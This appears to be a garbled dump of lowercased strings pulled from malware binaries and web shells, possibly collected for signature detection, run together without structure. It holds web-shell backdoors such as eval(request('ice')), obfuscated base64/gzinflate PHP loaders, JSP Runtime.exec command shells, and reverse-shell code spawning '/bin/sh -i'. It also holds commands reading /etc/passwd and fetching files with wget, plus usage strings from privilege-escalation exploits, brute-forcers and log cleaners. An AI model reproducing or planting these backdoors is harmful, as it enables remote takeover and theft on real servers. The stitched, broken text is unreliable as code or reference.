1 s.failed_logins \"failed login attempts\", select role, password_required from sys.dba_roles order by roleselect spid 'spid', status 'status', db_name (dbid) 'database', loginame 'login'bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -s <:server:> -u <:user:> -p <:l.login_policy_name as \"login policy\", mailto:support@sqldbx.coms.last_login_time \"last login\", [ ] resolving pslookupprocessbyprocessidthe target is most likely patched.dojibiron by ronald huizer, (c) master@h4cker.us .[ ] creating evil window%shandlef_indestroy[+] set to %d exploit half succeeded/churraskito/-->usage: churraskito.exe \"command\" fuck,can't find wmi process pid./churraskito/-->found token %s wmiprvse.exeselect * from iiswebinfoip - %d; login - %d; password - %d; combination - %dip - 0; login - 0; password - 0; combination - 0create %d ip@loginl;passwordubrute.comhttp://210.73.64.88/doorway/cgi-bin/getclientip.asp?ip=n
1 get http://%ws:%d/%d%s%dhttp/1.1j:\\chong\\s
1 @stego:syswrite(stdout, \"content-type: text/html\\r\\n\\r\\n\", 27);s/%20/ /ig;syswrite(stdout, \"\\r\\n</pre></html>\\r\\n\", 17);open(stderr, \">&stdout\") || die \"can't redirect stderr\";$_ = $env{query_string};$execthis = $_;system($execthis);s/%2f/\\//ig;<form action=\"changepwd.asp\" method=\"post\"> set ouser = getobject(\"winnt://computername/\" & username) value=\"<%=request.servervariables(\"login_user\")%>\"> windows 2000 oldpwd = request.form(\"oldpwd\") newpwd2 = request.form(\"newpwd2\") newpwd1 = request.form(\"newpwd1\") made to port 80 of the remote machine at 192.168.1.101 with theunable to resolve hostname \"%s\"source port for that outbound connection being set to 53 also. -s - outbound source port numberattempting to connect to %s port %dusage: concon \\\\ip\\sharename\\con\\conexitcode = oshell.run(\"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, oshell.run \"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, falseechob(\"regsvr32.exe exitcode = \" & exitcode)public property get ofs()cleanip - specify ip address which you want clear.logfile - specify log file which you want process.cleaniislog vermsftpsvcfatal error: mfc initialization failedspecified \"all\" will process all log files.specified \".\" will clean all ip record.service %s stopped.process log file %s...power by eyas<cooleyas@21cn.com>\\ipc$ \"\" /user:\"\"sqlcheck can only scan a class b network. try again.example: sqlcheck 192.168.0.1 192.168.0.254usage: sqlcheck <startip> <endip>runasex by assassin 2000. all rights reserved. http://www.netxeyes.comnote: this program can'nt run with local machine.%s execute succussifully.usage: runasex <username> <password> <execute file> [\"execute option\"]creation of results file - \"%s\" failed.c:\\>nbtdump remote-machinecerberus nbtdump<center><h1>cerberus internet scanner</h1><
1 d:\\hkdoor_src\\hkdoor_src\\hkdoor_src\\hkdoor_src_x32\\filterdriver\\release\\drvfltip.pdbsniffitmyworkstart%s\\sadeep.dll%s\\cangur.dathttp:%sport:%d&ver=cobra 1.2&mark=&id=noid&end=1 %d.%d&l_ip=drive=%c:&#1a&2b@doublesafezmunk:vistawin2000win2003win2003r2win2008win2008r2win2012win32swin7win8win95win95osr2win98win98sewinmewinxp%hso
1 httpqueryinfoa
1 varus_service_x86.dll/s %s /p %d /st %d /rt %dnet start %%1ping 127.1 > nulmcinitmispalertexsc start %%1net stop %%1workerrundnsapi.dllsoftware\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\%sconnect %s:%d http/1.1connect %s:%d http/1.1mozilla/4.0 (compatible; msie 9.0; windows nt 6.1; trident/4.0;)iphlpapi.dll%systemroot%\\web\\proxy-authorization: negotiate %sclsid\\{%s}\\inprocserver32b_wkndnsk^rundll32 \"%s\",%s/c ping 127.%d & del \"%s\"runmebydll32s
1 http://www.wzpg.comipsearcher\\ipsearcher\\release\\ipsearcher.pdb_getaddressipsearcher.dlldojibiron by ronald huizer, (c) master#h4cker.us [%s]: found \"ftp account: anyone/anyone@any.net\" !!!%s@ftpscan#cracked account: %s/%s[%s]: found \"ftp account: %s/%s\" !!![>] ms11-08 exploit\\epathobj_exp\\x64\\release\\epathobj_exp.pdb-
1 arun_startuprun_rebootrun_directuninstallcmdshellsu expportscanykcai's shell[%d] failed, %08x[%d] offset can not fetchedwoqunimalegebi$info: this file is packed with the upx executable packer http://upx.sf.net $$id: upx 3.91 copyright (c) 1996-2013 the upx team. all rights reserved. $<
1 http://www.foundstone.com%s %s port %d. address is already in usew03a2409.dllr
1 http://hkmujj.co.cc--------
1 decodeproductkeystarthttpfloodcodekeymessageboxgetfilezillapasswordsdatainudpzsocketsr
1 [memloadlibrary] code : %i64xget http://%s:%d/images/%d.asmx?%spost http://%s:%d/service.asmx/%dcontent-type: appplication/octet-streamg
1 ongetpasswordphttp://www.chinesehack.org/global\\ps%08xstrstrastrtointanessus_get_socket_from_connection: fd <%d> is closed[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%da fssniffer backdoor seems to be running on this port%s/churrasco/-->usage: churrasco.exe \"command to run\"/churrasco/-->done, command should have ran as system!mzkernel32.dllupackbydwing@e-mail : admin@luocong.comhomepage: http://www.luocong.com: %d - ustrreffix.dllultra string reference plugin v%d.%02dxscanlib.dllports/%s/%ddefault-tcp-portplugchecktcpportidttool.sysi
1 www.bing.com%s: http://%s%s/javascript/view.phptask %d failed %s,%dmozilla/4.0 (compatible; msie %d.0; [config]name = exe = cmd.exe\\cobra\\release\\cobra.pdb[name]object_id=[time][cw_local]system_pipeuser_pipe[transport]run_task_system[workdata]address1spstatusadaptablepost_fragpfsgrowperiodmicrosoft-windows-security-auditing4688appdata\\local\\temp\\rsys.exe7036rpc endpoint locator7045user mode serviceauto startg
1 http://%s/%s%u processor:memory (free/total): %d(mb)/ %d(mb) (use %d:\\buildsource\\9\\windowsclient\\windowsclient.client.rc\\binaries\\win32\\release dlphook\\*
1 [attempt-error] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu(description=(connect_data=(cid=(program=))(command=reload)(password=%s)(servicecn=^user^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.commyblog:http://hi.baidu.com/0x24quser_namefromwwhered
1 ' *** written by tim medin <tim@counterhack.com>response.binarywrite(stream.read)response.write(response.status & request.servervariables(\"remote_addr\"))%><a href=\"<%=request.servervariables(\"url\")%>\">web root</a><br/><%set folder = fso.getfolder(path)set file = fso.getfile(filepath)if ($_server[\"remote_addr\"] == $ip)header(\"http/1.0 404 not found\");<?php echo exec('killall nc');?><title>laudanum kill nc</title>foreach ($allowedips as $ip) {<form action=\"shell.asp\" method=\"post\" name=\"shell\">%comspec% /c dirset objcmd = wshell.exec(cmd)server.scripttimeout = 180cmd = request.form(\"cmd\")' *** http://laudanum.secureideas.netdim wshell, intreturn, strpresultport: <input name=\"port\" type=\"text\" value=\"8888\"><li>reverse shell - <li><a href=\"<?php echo plugins_url('file.php', __file__);?>\">file browser</a>'response.write \"<br/> -value:\" & request.querystring(key)(j)q = q & \"&\" & key & \"=\" & request.querystring(key)(j)for each i in split(http.getallresponseheaders, vblf)'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)s = urlscheme & urlhost & urlport & urlpathset http = server.createobject(\"microsoft.xmlhttp\")executable: <input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br><cfif ( #suppliedcode# neq secretcode )><cfif isdefined(\"form.cmd\")>remoteip = httpcontext.current.request.headers[\"x-forwarded-for\"].split(newremoteip = request.userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? $_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo $_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= \"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], $_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). add uses as simple 'username = \"password\"' lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' - antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk 